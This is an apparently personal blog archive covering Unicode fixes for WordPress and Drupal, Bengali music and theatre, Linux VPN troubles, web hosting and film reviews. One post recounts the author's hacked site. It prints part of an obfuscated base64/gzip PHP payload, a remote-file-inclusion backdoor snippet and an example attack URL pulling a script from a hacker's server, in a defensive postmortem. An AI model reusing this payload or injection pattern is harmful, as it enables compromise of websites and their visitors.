Wordpress and Unicode

You type some non-English character in Wordpress or Drupal editors. You save it only to find those characters have become ????. If this describes your problem, then you have an issue with Unicode. You need to turn on Unicode support for Wordpress and Drupal. It will require some change of code. Basically, both Wordpress and Drupal supports Unicode. However, by default, the databases are not configured to store unicode characters.

Wordprss

For Wordpres, the modification is straight-forward.

1. Open up ‘wp-config.php’ from the root directory of your WordPress installation.


2. Comment out the following lines by adding ‘//’ at the very beginning of the following two lines:
   define('DB_CHARSET', 'utf8');
define(’DB_COLLATE’, ”);

So that section should now look like this:

//define('DB_CHARSET', 'utf8');
//define(’DB_COLLATE’, ”);

[Source: http://hansengel.wordpress.com/2007/10/09/wordpress-unicode-and-s/]

Drupal

For Drupal, the change is a bit more involved:

1. Go to to the root directory of your Drupal installation.


2. Save the following code in a file named collate_db.php


3. 
   

   <?php
   # Do not change anything below this ( :-) <- Rewwrite Editors note.)
   require_once("includes/bootstrap.inc");
   require_once("includes/database.inc");
   require_once("includes/database.mysql.inc");
   $connect_url = 'mysql://user:pwd@server/database';
   $active_db = db_connect($connect_url);
   $sql = 'SHOW TABLES';
   if ( !( $result = db_query( $sql ) ) ) {
         echo '<span >Get SHOW TABLE - SQL Error: ' . $result . '<br>' . "</span>\n";
      }
   
   while ( $tables = db_fetch_array($result) ) {
      echo $tables[0];
   # Loop through all tables in this database
     $table = $tables[key($tables)];
   
     if ( !( $result2 = db_query("ALTER TABLE %s COLLATE utf8_general_ci", $table) ) ) {
          echo '<span >UTF SET - SQL Error: <br>' . "</span>\n";
   
            break;
             }
   
     print "$table changed to UTF-8 successfully.<br>\n";
   
     # Now loop through all the fields within this table
     if ( !($result2 = db_query("SHOW COLUMNS FROM %s",$table) ) ) {
            echo '<span >Get Table Columns Query - SQL Error: <br>' . "</span>\n";
   
            break;
             }
   
     while ( $column = db_fetch_array( $result2 ) )
     {
        $field_name = $column['Field'];
        $field_type = $column['Type'];
   
        # Change text based fields
        $skipped_field_types = array('char', 'text', 'enum', 'set');
   
        foreach ( $skipped_field_types as $type )
        {
           if ( strpos($field_type, $type) !== false )
           {
              $sql4 = "ALTER TABLE $table CHANGE `$field_name` `$field_name` $field_type CHARACTER SET utf8 COLLATE utf8_bin";
              $result4 = db_query($sql4);
   
              echo "---- $field_name changed to UTF-8 successfully.<br>\n";
           }
        }
     }
     echo "<hr>\n";
   }
   ?>
   

   
   


4. Look at the red line in the code in red (5th line). You have to replace that part with your installation-specific information.


5. Open the file sites/default/settings.php under the same Drupal root directory. Copy the rest of the line of
   

   $db_url =

   
   and paste it after
   

   $connect_url = 

   
   in the above code.


6. Save collate_db.php


7. Open a browser window and request the collate_db.php from your browser.


8. If everything is fine you would see something similar to this:
   access changed to UTF-8 successfully.
   ---- mask changed to UTF-8 successfully.
   ---- type changed to UTF-8 successfully.
   

   ---

   <--- Lines not shown --->
   

   ---

   watchdog changed to UTF-8 successfully.
   ---- type changed to UTF-8 successfully.
   ---- message changed to UTF-8 successfully.
   ---- variables changed to UTF-8 successfully.
   ---- link changed to UTF-8 successfully.
   ---- location changed to UTF-8 successfully.
   ---- referer changed to UTF-8 successfully.
   ---- hostname changed to UTF-8 successfully.
   

   ---



9. Delete collate_db.php for security.

You are done.

[Source: http://www.urbannatives.net/localtreechild/..._ci_and_tabl ]

Baul

I cannot claim myself to be any expert on Baul songs. I have heard my share of Baul songs, mostly from radio. However, I have been fortunate to have two coincidences working for me in this respect. First, I like wrtings of Sudhir Chakrabarti. He was a professor of Bengali, but his passion was Bangla songs. Though he started writing rather late, he has been relentless in churning out articles since he started writing popular articles with seriousness. These articles are not just nonsensical pot-boilers. There are goods and bads, but none is insignificant. Sudhirbabu's other passion is Bengali Folk culture. I think I have painted the description of the passion with too broad a brush, but could not find a better description than this. He doesn't do it as a paid occupation. It's his labor of love. I don't know whether he follows the right research methodologies or not. But I could not care less. His research produced books like ব্রাত্য-লোকায়ত লালন (Bratyo Lokayoto Lalon), বাউল ফকির কথা (Baul Phakir Katha). Through these books and other writings of Sudhirbabu I got interested in the Baul way of life, and especially the Baul songs, though I learned that Baul songs are part of the Baul way of life. Without understanding or experiencing the Baul way of life one can neither appreciate nor fathom the Baul songs.

My other, and possibly bigger, influence for Baul songs is my friend Sudipto Chatterjee. Sudipto teaches and works in theater and performace stidues. But he picked up a penchant for Lalon Shah pretty early on. I remember the day when I first met him, about fifteen years ago, he boasted that he had already collected all Lalon songs. Only later I could understand his pride in that posession. He (and Theater director Sumon Mukhopadhyay) travelled to Kushthita, Lalon's birth and workplace, in Bangladesh in 1997. The materials they collected there, and since then, finally bore fruit in the form of a Perfomance called "The Man Of The Heart". A performance on Lalon's life and work, writtent and performed by Sudipto and directed by Sumon. I have heard numerous Lalon songs from Sudipto, along with stories, anecdotes and explanations. I heard about Panju Shah, Duddu Shah first through him. These, Sudhirbabu's books, gave me a better idea about the journey of Baul culture through history, both social and political. In most case, these two were intermingled intimately.

Later, thorugh a Bangla folk band called দোহার (Dohar), I first heard Abdul Karim's song. And I was bowled over immediately. Later I tried to dig up information from the web about Abdul Karim, who uses Baul Abdul Karim as his bhonita in some songs. There is not alot of information about him on the web, at least not as much to satisfy my curiosity. However, I came to know that he is still alive and well, though he is over 90 years of age. He still writes songs. But he has already become an institution in Bangladesh. I could not figure out whether he leads a strict Baul life. But that does not matter to me at his point. You can check out some of his songs in Youtube by searching on his name.

Ain’t No Luddite

I am not an adopter. I don't work to stay ahead of the technology curve. Rather, I fall quite far back in that curve to see all my friends and most of my family and acquaintances pass by me and my wife. But the truth is that I am quite happy and content being a follower. I keep my OS at least one version behind the latest and the greatest. Currently, even though my sparingly-used Windows machine runs XP (used only for music production since I have already invested money and learning-time on software that runs only on Windows), I have the latest OS version (Ubuntu Intrepid Ibex 8.10) on my primary home machine. I resisted having a cell phone for quite some time before finally jumping on the bandwagon in 2003. Even then I have pretty basic cell phone which is used as a - surprise! surprise! - phone to call people. No blackberry, no iPhone, no Android, no nothing. We don't have a LCD or Plasma TV, mostly because we don't need it. We don't watch TV or movies that much. 90% of time, our TV is playing either Baby Einstein DVD or PBS Kids show. Our DVD player is a $25 Coby. My home theater is a 8-year old system. My Bose Acoustimass speakers are sitting comfortably in the closet, gathering dust. Five-and-half-years since we have moved into this house, I didn't get energy, urge or serious nudge from Paramita to hook those on. On the social networking side, I have got onto Orkut after a having a dormant account for quite a while, thanks to Paramita for finally making me active there. But that's been almost one-and-half years. By that time most of my friends there have moved on to the greener pasture of Facebook. I have too. But only recently. And I am still trying to figure things out there. Now I see people are using Twitter. I guess, it will take me at least an year or two before I get on to Twitter.

The reason I started this post is, I think the best thing that have happened in last two years on the Technology side, as far as I am concerned, is Pandora. It's really awesome. Those who haven't yet found Pandora: it's a Music Genome Project. The site says:

Together we set out to capture the essence of music at the most fundamental level. We ended up assembling literally hundreds of musical attributes or "genes" into a very large Music Genome. Taken together these genes capture the unique and magical musical identity of a song - everything from melody, harmony and rhythm, to instrumentation, orchestration, arrangement, lyrics, and of course the rich world of singing and vocal harmony. It's not about what a band looks like, or what genre they supposedly belong to, or about who buys their records - it's about what each individual song sounds like.

So the idea is that you start with one of your favorite songs. Then based on the musical attributes of the song, Pandora will select other songs. For each song, you can tell Pandora whether you like this song or not, thereby 'training' Pandora to your taste. You can create 'Radio Stations' based upon this song. A 'Radio Station' can be created by Artist or by Genre too. There is a cool feature called Quick Mix, which is basically a random play of songs from Station you have selected.

It's really easier to experience and experimet with Pandora than explain how it works. You need a registration for creating Stations. But registration is free and require very little information. However, there is one caveat. The service is only for North American audience. I understand that is due to some licensing issue. If you are in North Americal (or have an North American IP address ... wink wink), go there and have some wonderful musical experience.

BonGoLipi

Finally released Bongolipi.

I live in the San Francisco Bay area. We have a pretty sizable Bengali population from both West Bengal and Bangladesh. I guess there are a few Bengalees from Tripura as well, though I personally know none. With this population, and mind you most have quite a bit of disposable income, it is quite sustainable to run at least two restaurants serving traditional and modern Bengali food, one would think. But in reality, there is none. In my 10+ years stay in this area, I have seen a few restaurants come and go. First there was Charulata. It closed doors after running for less than a year. Then came Cafe Dhaka. They had a longer life. I think it ran for about 4 years before it went out-of-business. Actually there is Gulistan. As far as I know they are still open. But in all fairness, they are more famous for their North-Indian and Pakistani cuisine than Bengali food. We have tried the place a couple of times. In our opinion also, their Lamb Chops are better than their Ilish preparation.

Last year-end, while we were in Los Angeles, we tried Aladin - LA's Bengali restaurant.

My general observation for all these restaurants is that the food is mediocre, at best. That, too, lacks consistency of quality. One day your Shorshe Ilish is so delicious that you rush back next weekend only to find a different tasting Shorshe Ilish that is so, um, bad that you would think that you have come to a different place. Also, these places lack any characteristic decor (Charulata had the best decor among these, though that doesn't say much), some are outright dirty by western standard. The service is homely but unprofessional. Overall, not a good eating experience.

That makes me thinking, why Bengali restaurants do not make good business? I think, there are valid reasons from different level.

• Bengali food is generally bland compared north Indian food. Bengali food requires developed palate. Compare Lau Ghonto with Aloo Gobi


• Bengali non-vegetarian specialty is fish cooked in such a way that it keeps the fishy flavor, which is synonymous to smelly for non-initiated. Any place that cooks fish in Bengali way smells repellingly fishy


• Bengalis want to eat only exotic or semi-exotic items in Bengali restaurants. I have heard Bengalis saying, "I can cook and eat those daal and lau ghono at home. Why would I pay for those. I will go to a restaurant to have Paturi, Daab Chingri, Koi Gonga-Jamuna. If insisted I can even try Shorshe Ilish, but that better be excellent."


• Bengali entrepreneurs who take the risk of opening these restaurants ignore aspects of a restaurant business other than the food quality. There also they try to cut corners. Without requisite amount of cash infusion to put up a comfortable place with good service and food, its hard for Bengali restaurant business to run successfully. If you have a already established cuisine with unlimited pool of customers who are addicted to that kind of food, you can forego the frills. Take Pakistani-Indian restaurants like Shalimar, Pakwan for example.

I would say, if you want to start a Bengali restaurant go with a good investment and for a longish haul. Hire the best Bengali cook. Get him or her from India or Bangladesh. Don't just make your mother-in-law toil in the kitchen pretending to be the head-cook. She may cook excellent Mochar Ghonto, but she definitely lacks training to manage and run the show in a busy restaurant. Set up a good ambiance. Use good plates and silver. Have enough and properly trained servers and busboys. Get a trained manager and steward. Make it a legitimate business instead of looking at it as a part time source of extra income with some spare-change investment. Respect the business and get the respect and patronage of the customers.

Don’t Read This …

... instead, read Robert Fisk in The Independent - Why do they hate the West so much, we will ask. What I wanted to say and could not, is there.

...

As we are entering into the new year, the news and life is bleak all around. This is particularly true for the people in Gaza. They are a hapless victim of a lethal pounding from Israel. What Israel is doing in the name of 'self-defence' is totally and absolutely unacceptable to any person of rationality and conscience. This is not to condone the behavior of Hamas, but a much bigger blame must be affixed to Israel. But I guess this is somewhat expected from a aggressor and occupier like Israel.

What is more unacceptable to me is US foreign policy towards Israel and Palestine. In 2008 Israel was the recipient of the biggest chunk of US aid. 2.4 Billion. "Virtually all of this money is used to buy weapons (up to 75% made in the U.S.). Beginning in 2009, the U.S. plans to give $30 billion over 10 years." (Source: Parade magazine) I have tried to figure out the reason for this uncritical and total support of Israel from US, especially if we remember the English statesman Lord Palmerston's aphorism that "Nations have no permanent friends or allies, they only have permanent interests." It is true that US has to have a strong ally in that region. It's strategic importance is too high to ignore for US. Israel fulfills that requirement. However, it has also become quite clear that the blind support of Israel and its aggression is given rise to a deep hatred towards US. Not only in that region alone, but all around, especially with such a blatant nonchalance from Israel's part when more than a quarter of the victims are civilians, mostly children. Israel-Palestine issue has become a very potent tool for separatists and terrorists to recruit and deploy youths all around the globe - be it Middle East, Afganistan, Iraq, Pakistan or Kashmir. In the final tally, a blind support of Israel's aggression retuns a negetive balance to USA's foreign policy balance sheet. I guess, US can still support Israel and it's existence and still maintain some semblance of balance. It may not be an easy task. But the deplomats and the elected officials are not selected or eleced to do easy tasks.

Fast food for thought

I just rebooted my office machine running CentOS 4.6, which is based on Red Hat Enterprise distribution. It was running for 121 days, i.e almost 4 months!!

Ubuntu Intrepid and vpnc

My company has a decent work-from-home policy. Every Thursday we can work from home. And most do, including myself. In addition to the regular Thursdays, we work from home whenever there are project deadlines - which is almost always. Hence, to have a solid VPN connection is a must for me.

My last non-Ubuntu desktop was Fedora. I compiled the Cisco vpnclient and used it without a problem. When I switched to Ubuntu Edgy (6.10) I started using the open source vpnc which worked quite nicely. The upgrade to Fiesty (7.04) and Gutsy (7.10) worked fine too. But from Hardy (8.04) the problem of dead-peer-detection raised its ugly head. There were patches available, but that didn't solve the problem for me. I was looking forward to the Intrepid (8.10) release hoping the the vpnc issue will be resolved for good. After Intrepid was released there were contradictory reports about whether the dead-peer-detection issue has been resolved. I decided to test it out myself. So I upgraded to Intrepid.

vpnc can be used from command line, or else one can install the vpnc plugin for the network-manager (nm) and control the vpnc connection from the network-manager applet. Until now, I have only used the command-line. But this time I have tried both for testing. This is what I have found:

• The dead-peer-detection issue is solved both in the command-line client as well as network-manager plugin when you pass the dead-peer-detection interval value 0 to the command-line program or check a box in the network-manager plugin.


• network-manager plugin has a bug that overwrites the resolv.conf when the VPN is disconnected. I am forgetting what exactly is the nature of the bug, but basically it didn't revert back to the original resolv.conf after VPN session ended. The bug may only be for the static IPs.


• Even if the dead-peer-detection issue was resolved, my VPN connection would just stall for a minute or two before continuing after I have typed about 10-15 characters in my SSH window. And this repeats over and over again. Googling the problem suggests something to do with routing table and/or DNS lookup. I tried different things for a while but none could resolve this issue.

At last I gave up and went back to the proprietary cisco vpnclient. I compiled and installed it following this post. Since then I am having a smooth VPN ride. I would love to go back to the open source vpnc client, but not at the expense of stability of connection. I need to earn my bread.

The new voice of our time

A couple of weeks back our local cultural association Sanskriti organized its fourth Natyomela - a Theater festival. Our group ENAD could not participate in the festival this time. However, this year Sanskriti introduced a slot for an "outside" group. That outside group was ECTA from New Jersey. They brought a new play Taconic Parkway, written and directed by Sudipta Bhowmik.

Sudipta Bhowmik was somewhat known to the bay-area theater aficionados. He is operating in Bengali theater scene in north America for a while now. He is quite well-known especially in the east-coast circuit. For some reason, he never got a chance to bring his play to the west coast before. We, at EAND, were happy to do Ron - our last production - which was his play. I think that was the first exposure people got to Sudipta Bhowmik's work here in the bay area.

This time he also directed his three-cast play Taconic Parkway. It's a very powerful play. It may not put you in an internal conflict that Ron might have, but this play may well put you in a spell. He has masterfully woven an unusual story in a non-histrionic way. (That is, if you take the negative connotation of histrionics.) I will go out on limbs and say that Sudipta Bhowmik is producing some of the most powerful and important Bengali plays of our time. That includes Kolkata and West Bengal. (I am not very conversant with Dhaka's, or Bangladesh as a whole, contemporary plays, mostly due to accessibility problem.) More importantly, he is providing a glimpse to the actual USA-residing Bengalees. This is not the picture you get in mainstream magazines and mundane media portrayal.

Someday, I hope to write a more studied observation of his plays through more minute reading, but as a somewhat informed audience I can only appreciate his work. He is definitely blessed with some very competent actors. I am sure that helps him not only to mount a good play as a director, but also as a playwright since he can experiment with his characters. But still, the bottom line remains that he is writing some worthwhile plays of our time.

Thank you Sudiptada. Thank you for the plays.

Tin Pahaarer Gaan

I came across Birendra Chattopadhyay's work when, I believe, I was in high school or in first year of college. My impressionable mind immediately fell in love with his work. He was never a mainstream poet. But his poetry borne a unique and strong voice which I seldom found in others. Around the same time I found a cassette published by School of People's Art which contained songs and recitation of Birendra Chattopadhyay's poems. The songs were created out of his poems by Binoy Chakrabarty. He did and excellent job. Together with the poems and this cassette, Birendra Chattopadhyay made a lasting impression.





I loved a long poem called 'Tin Pahaarer Gaan' literally "The song of Three Mountains" or "The song of a mountain called Tin Pahaar". I starts with 'Pahariya madhupur metho dhulipoth' and continues to give a vivid and wonderful imagery. Around that time I also started composing songs. So I put tune to it - not tothe whole poem though. I stopped when I thought was the right moment for a song to stop. This was 1988-89. I kept it to myself and never published it. In 2007 I arranged it. This is that song.

Portrait of a hack

It's been a long time since I updated the page. Again. As I was intending to update the page with the report of my latest endeavor, something unexpected happened.

Last Sunday morning, I woke up to receive a terse mail from my hosting company - Host Monster - that my basus.net account had been deactivated due to "terms of service violation". So I called them. The Tech support guy confirmed that the account had really been deactivated because there is a phishing page lurking inside my site. He suggested that I talk to their Abuse department. Even though it was a Sunday, there was somebody in Abuse department I could talk to. She pointed me to a directory called 1/ inside my webroot folder. That, and few other files, seems to be gratuitous contributions of the hackers. She said once I removed the offending pages and they confirmed that I did, they could reactivate the account. I got off the phone and the first thing I did was to remove the 1/ directory. Looking back, I think, that was a knee-jerk reaction. I could have avoided that. I, then, moved my original webroot folder and put up a placeholder page instead. After these minor surgeries I called my hosting company's abuse department. She looked at the directory to confirm that the offending pages are really gone. Once confirmed she immediately reactivated my account. I briefly chatted with her about the possible backdoor and inquired if they had any tool to sniff backdoor. They don't have any tool but she gave me pointers to some usual suspect applications. Fortunately I didn't have any such application. However, that's unfortunate too, since now I have to hunt the backdoor myself manually. It also means that the backdoor is possibly an inadvertent creation of my sloppy coding. Tooo baad.

But one thing I want to mention here, I found my hosting company's support impeccable. They were helpful, to-the-point and not too finicky. Deactivating my site showed they had a good policy in place against questionable content. Kudos.

Once my mail server etc. are back online and offending material offline, I had a few tasks at hand. In order of priority, they were:

1. Remove all injected files and content


2. Find and fix backdoor


3. Put site back online

So, here are some interesting things I have found on the way. These must have been well-documented in some security website. But, here is what I have found.

Modus Operandi: Once the hackers find a backdoor, they push a file through the backdoor. This file then becomes the hacker's gateway. They come and go through this door at will. They can pretty much see what's there inside, put files (scripts) there and sometimes hijacks the site.

File Extension: Some of the initial files that the hackers upload had .jpg extensions but they are actually PHP scripts. For example, php3.jpg, lila.jpg or sh6.jpg. I think, they want the site owner to overlook any .jpg file thinking they are image files hence harmless. PHP engine, though, is not fooled by the extension. It will execute file any extension as long as it is valid php code.

Offending files: The most interesting is php3.jpg. It looks like a binary file

 <? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
B69VdTxCCJBZhCUBNv3WBZ1r+P59V3YicpFSCzau
qu5ZzvRMt1EukZFbZERkZMRvJx9+mw6mf/2LorQc
1XKMSV/S1NHI/utfjJ60+a43m2iOYU7u9SfDduxN
ua87Y0OzTMcY6/LWlvQ7LyGJOZuQMYIKmxszW9di
0gb8d0v6KOlP05HZ1TdlSY5JQumtY8nSnZk1kTY3
eyNTdbZIRWlb4p8I4Pjr17/+Rbcs07q39KlJsN3c
2zr+61/+bvQnpqXfQyXrXu1A1ma7eVkgWbbu3I/V
vqHdP85MR7fvrdmEtJrA7I2FMQHEbMdyzJG50K1N
e9aBr836Wf2+1oolYrvQy48fJRkKylChq/eMCfTA
xuEioxDz9xyh4tj1g+32p9omjlj0wEKbxtT2DylN
2/x5Q7Ws2Mbwoyyz6oZ9D0nq8ybmkCrQe1UbkG9J
tSUofLIxZ6VJ52bTKXRuY7glvYPOnJZr2Uy5hfBY
I1jzk7wxlL/gOH+V9JGtS78TeB8ZIiPVHui0JC3D
qzJokAgDet8sNC4LrTZUIzjej3Wrr29u3OdqtYtS
IbZxf1pow3/rtVYbx8pF3a0YxP+dYcMkbm4A8pAC
fwD0xpysBmjPHsx1xFFOxhPS1NJ3LH2kq4B8Z2aM
utJPyX35WFKU3Myy9IkjQWEbxhZXfK5WLZZOL5uZ
dqlWlTLVvNQqtNul6mmLrX59PHVgjGcTXEP2zBph
+/BbM82hAWtAOzqyByRDhhW8gT8QERnHAcdPBCKC

However, if you look closely, you will notice that it starts with "<? eval(gzinflate(base64_decode('". This basically tells the PHP engine to inflate the gzipped and base64 encoded content that follows. When I explode, it became a html which looks like this in a browser



Backdoor: There were a couple of backdoors in my site (at least the ones that I have found). All of them are similar.

PHP script can run another script by calling a function named include(). Suppose you have a script named foo.php and another named bar.php. In foo.php you may have a call like:

include('bar.php')

Now if you request foo.php from a browser, it will also execute bar.php, even though bar.php was not explicitly called or requested.

Now the bar.php does not need to reside on the same directory or even the same file system. bar.php may be sitting on a different webserver, 10000 miles away, reachable via a HTTP call - http://bar.com/bar.php. Now, still foo.php can execute bar.php via http. Your include will simply say,

include('http://bar.com/bar.php')

PHP will take care of opening a socket to the bar.com server, create a HTTP request to bar.php and execute its content after receiving the HTTP response.

Now, suppose, instead of hard-coded http://bar.com/bar.php as the argument of the include() call, you pass a request parameter - something that you got via a POST or a query-string.

$myscript = _REQUEST('myscript');
include('$myscript);

Now, you have a backdoor. How so? If a malicious hacker knows about this two lines, she can make a request to foo.php like this

http://<servername>/foo.php?myscript=http://<hackersserver>/malicious_script.php

foo.php will obidiently execute whatever malicious_script.php asks it to do. Now the question is how the hackers know of those to line of code. By looking at other links on your site (or other sites which links to your site) and guessing. This is not difficult.

I precisely had this backdoor. Three of them. I think hackers exploited two out of three. I have fixed the code, or I think I have until hackers expose another backdoor. I have also written couple of monitoring and reporting scripts which will periodically look for any change in my site. Let's see what happens.

On a subsequent post, I will try to write more about the files the hackers put.

Update: I never got a chance to write more about the files the hackers uploaded. However, another thing of importance here. The hackers modified my root .htaccess file. That's the configuration file for Apache web server and it affects the tree underneath, unless overwritten by another local .htaccess file. They put a Rewrite rule in the .htaccess. Apache rewrite rule basically can modify a request line. For example, a browser may request for a file called "foo.html". Via Rewrite rule, you can serve some other file, say "whatever.html". Since, this happens without browser's knowledge, browser still thinks that it got the requested foo.html file. That's exactly what happened in my case. The hackers wrote a rewrite rule in such a way that if a request came through a search result (identified by the Referer header), it shows some Viagra ad page that they uploaded. And be careful, they bury the Rewrite rule in .htaccess file after a bunch of blank lines, so that when you open the file in an editor, you won't see it without scrolling down. Very clever.

Super Tuesday

Song puzzles

I have some old recordings in my possession. Old means really old - at least fifty years or more. I have a cousin, who is a professional Audio Engineer with a big studio in India. But his passion is music from a very very tender age. As they say, he lives for music. When he was a student, he used to roam around in Kolkata to collect old records. I guess these recordings came from those ventures. These are recorded from noisy 78 RPM disks. I haven't tried to cleanup the recordings. I have noticed in my earlier attempts of cleaning that unless one has lots of time and really good tools, it's better to leave the noise. Incompetent noise-reduction kills the song more than the noise does.

Move over to my Music Broadcast page and listen to the Recognize the singers section. If you can recognize them before I publish the name, drop me a line.

What is a great art?

I have found that my idea of art and its impact on the audience has changed over time. I understand, this is quite natural and most everybody else also experience this changing attitude towards art and its effect over time. It's just the other side of the fact that I get moved differently every time I read, say, the play Daakghar (The Post Office).

Art, no matter what form, needs to move its target audience emotionally. We - this term may need some elaboration, but please take it on the face value for now - tend to over-analyze art. I even feel that sometimes we go to some concert or play or read some book just to analyze and critique the art. And in the process we forget to enjoy it. May be, on a subconscious level, we are thinking, "I may not be an artist but I am a critique who can analyze and tear apart any artist's work - main hoon baap kaa baap".

What I said above is not directed to anybody in particular but me. I few months back I realized this sad fact that the gratuitous critic in me is coming in the way of my enjoyment and the art. My training and knowledge in some form of art, namely music and drama, is not helping me either. During an intense dramatic moment of a play, part of my mind is analyzing the blocking, the lights, the actors' business and so on. While listening a new song, my mind gets unnecessarily concentrated on the arrangement of the song, the chord progression, the crispness of the recording. In the process the dramatic moment and the song is gone, probably forever. The first experience never comes back.

I am actively trying to correct it since I found this lacking of mine. And trust me, it's not easy. Apart from untraining and retraining my senses and mind, there are some more philosophical dilemma to sort out. The biggest of them is, "Just because an art moves me emotionally, should I call it a great piece of art?" I tend to answer a subjective "yes" though I am fully aware that some second rate tearjerkers can and do move me emotionally quite often. And of course there is the other side too, where a piece, which is considered great art by many, failed to impress me at all. However, I rationalize that by accepting that it may be a result of my improper training.

The bottom line of art appreciation is training. Most of us are self-trained in art appreciation and most of us are smart enough to separate wheat from chaff. The problem is with the borderline staff - the staff that cannot be called great at the first experience nor cannot be pushed aside as crap. A great art will move you emotionally as well as give you enough food for thought that you ruminate for a few days, if not weeks. A crap art will give you neither. The borderline case will give you some. Unfortunately, the world of art is full of these borderline cases. And the fact that it is majority in the world of art forces us to bring out the critic from inside us more often than it forces us to just sit back and enjoy. That's a sad fact of thinking life.

A Tale of Java, Ubuntu and Fonts

As a part of an ongoing Java project, I had designed a rudimentary Java text editor. The project is a WIP, so every so-many-months I put my minds on it only to stray away in a few days. Last time I worked on the editor part of it, I was running Fedora core with Java 1.4, maybe 1.5. The code loads a non-English font into the editor and then you can see those fonts as you type. The font is ttf font which was loaded as System fonts in /usr/share/fonts directory with the updated font-cache. It worked just fine, loading and showing this font (the name, BTW, is itxBeng. It's a Benagli font) without any glitch.

A couple of weeks back, I opened up the code on my Ubuntu 7.04 with Java 1.5. And surprise, surprise!! When I am supposed to see Bengali characters, I now see gibberish. My first reaction was that I might have changed some code and forgot about it. I told you, I haven't touched this code in a while. So I looked at the font-loading code, but did not find any problem or resolution. I was furiously scratching my head. No clue, what's happening!?

Next day I ran the code on my office computer, which is running CentOS 4 (basically repackaged Redhat distribution) and Java 1.5. To my not-so-big-surprise, the fonts loaded just fine. So I narrowed down the issue to Ubuntu problem. So next I installed Java 1.6 on my Ubuntu machine. This time the fonts loaded fine. I haven't played extensively after that, so don't know if there are other problems. But the most intriguing problem is gone, or at least I ahve found a work-around.

Bottom line: Ubuntu 7.04, Java 1.5 and ttf fonts manually loaded in system do not play well.

After a hiatus

I just finished directing a play by Sudipta Bhawmik called Ron. It's a very relevant story of our time waited to be told. Sudiptada has weaved a magic spell of contemporary tale on an age-old philosophical conflict between the need to fight some wars and the principled position of anti-war. This not only looks at the current time, it does so from the first generation and second generation immigrants' perspective.

After the play there was a short Q&A session with the playwright where he said that the play is definitely anti-war. But I am positive nobody can call it propagandist. I actually found it to be well-balanced and portrays the viewpoint of a soldier and his family's perspective in a very touching way.

After being involved with immigrant Bengali community theater for about 7-8 years, what I find most challenging is to capture the imagination of the community. The issues, the problems, the dreams, the hopes, the frustrations, the achievements of the first generation immigrants are different from the folks back home. Yes, this is true that the first generation, especially we the Bengalis, do enjoy living in a bubble of nostalgia when it comes to culture. We prefer Rabindrasangeet over classic Jazz, Bhimsen Joshi over George Gershwin, Kishore Kumar over Norah Jones. We prefer to go and see the current crops of group theater when we visit Kolkata, but seldom make attempts to see the local repertory theater's productions. However, we do live our lives outside that bubble and constantly get challenged by a different world than what we used to face back home. Our theater should capture that.

In Ron, I thought, Sudiptada could strike the golden balance there where he could evoke a sense of nostalgia within the realm of our everyday existence. Our third production Chhenra Collage also struck that balance, it seems. Even after our tenth production some of the regular audience still refer to the third production. I may have some conjectures as to why this is happening, but cannot really tell for sure. But one thing is for sure, I like to continue doing this kind of theater where we can introspect our contemporary lives with compassion and humor.

One more host change

For past few days I have been busy with accommodating another change of my host. This is my second change in as many months. I was hosting with 1and1.com since 2005. It was a decent host - excellent top notch service as far as server up-time, availability and speed are concerned. However two of the peeves that I had were it didn't offer enough features for the dough and there was no ssh service for my plan. 1and1.com also seems to have configured its service in a nonstandard way. For example, even with your own domain, your mail server domains will be 1and1.com; you cannot choose your own username for login, you are are forced to remember some random string of digits.

So I moved my host to Dreamhost on October. It has a very impressive array of features for a very decent price. I have seen its server held quite firm after a digg effect on one of the domains it hosted. Also read some reviews which even though didn't put it in the top performer slot, nevertheless put in somewhere near there. Since, my site is very very low traffic site, I didn't bother. But I should have. After moving, I spent quite a bit of time redesigning my site, only to discover that server response is not very good - barely acceptable. But the real damper was its mail server. The server that hosted my mailserver had a history of problem and Dreamhost was in the process of upgrading the hardware when I moved my host. Dada was complaining that he basically couldn't do anything on his mailbox. He was connecting via IMAP. The only think he could do is downloading the headers, but server timed-out 9 out of 10 times while downloading the body. I thought it was temporary. But even after the claimed hardware upgrade, things didn't improve. At that point I decided to quit. But to be fair, I must say that I didn't have any problem connecting to the mail server using POP3. In conclusion, I think Dreamhost has good intentions and all the makings of a good host, but it may need to put a lot more focus on performance at this time.

Then enters HostMonster. I read very good reviews about the host. More than one review sites put it on the top of the heap. It claims to host more than 200,000 domains. Even though most of the things in all Linux hosts are almost same, they have enough differences in settings that warrant at least a couple of days of tweaking my code to run seamlessly. Same story here. Finally I think I am done. The jury is still out, but so far I am seeing improved speed of access. Dada informed me that he now has no problem with mail connection using IMAP. Hopefully I can stay with these guys for some time.

15 Park Avenue

I have been a cursory follower of Aparna Sen's works. The ones that I have seen are Parama, Paramitar Ekdin and 15 Park Avenue. I have seen neither 36 Chowrangee Lane nor Mr and Mrs Iyer - the two most acclaimed movies of Aparna. I haven't seen Sati or Yugant either. And though I watched the telefilm Picnic, I don't remember anything from that movie except a shot where (I think) Farida Jalal singing 'mera laal duptta malmalka'.

For me Parama was a disaster. But I liked Paramitar Ekdin quite a bit. Aprna's narrative style and treatment of the subject went well. And the acting from Rituparna and Sohini stood out.

I can say almost similar things about 15 Park Avenue. The narrative style went well with the subject. Acting was quite well all around. But I have some peeves about the character development. Take the case of Anjali, done by Shaban Azmi. It's the weakest among the major characters of the film. It's too white with almost no grey except some patchy outbursts here and there. It takes an actress of Shabana's caliber to impart convinciblity to the character. The mother character played by Waheeda Rahman didn't get enough screen time to develop. Though Aparna is one of the very few directors who can create a believable female character with only a few strokes. That happened here too. Aparna's handling of human interaction between two females is also something that stands out from most of his contemporaries.

Konkana Sensharma excelled in her character. True it was the proverbial 'author-backed' character - but still it was not at all easy to play a psychological patient and a complex character. She seems to have an array of acting capabilities in her. Her face speaks with the same rich diction as does her round voice.

In the storyline, I thought, the coincidence of Joydeep (played by Rahul Bose) seeing Mithi (KS) was a spoiler. It could have been somebody else. But bringing Joydeep back, the director was forced to spin a subplot of Joydeep's present relationship with his wife - which, to me, didn't add anything to the main plotline other than some distractions.

Another aspect that Aparna disappoints me frequently: it's the cheap attempt of showing some universal message/philosphy. Take the scene where Mithi is forced to go through a Ojha-session. With all the onscreen hocus-pocus, the superimposed audio track plays Anjali's class lecture on quantum physic or some hifi physics topic. Where is the subtely, Aparna? Again near the end of the film, Kunal says "She is looking for something" when Anjali reply "Aren't we all?". Jumpcut. C'mon. It's too cheesy to come from a director like Aparna.

Dhritiman was ok too, but just Ok. And this is first time when Dhritiman (as Kunal) as an actor failed to impress me.

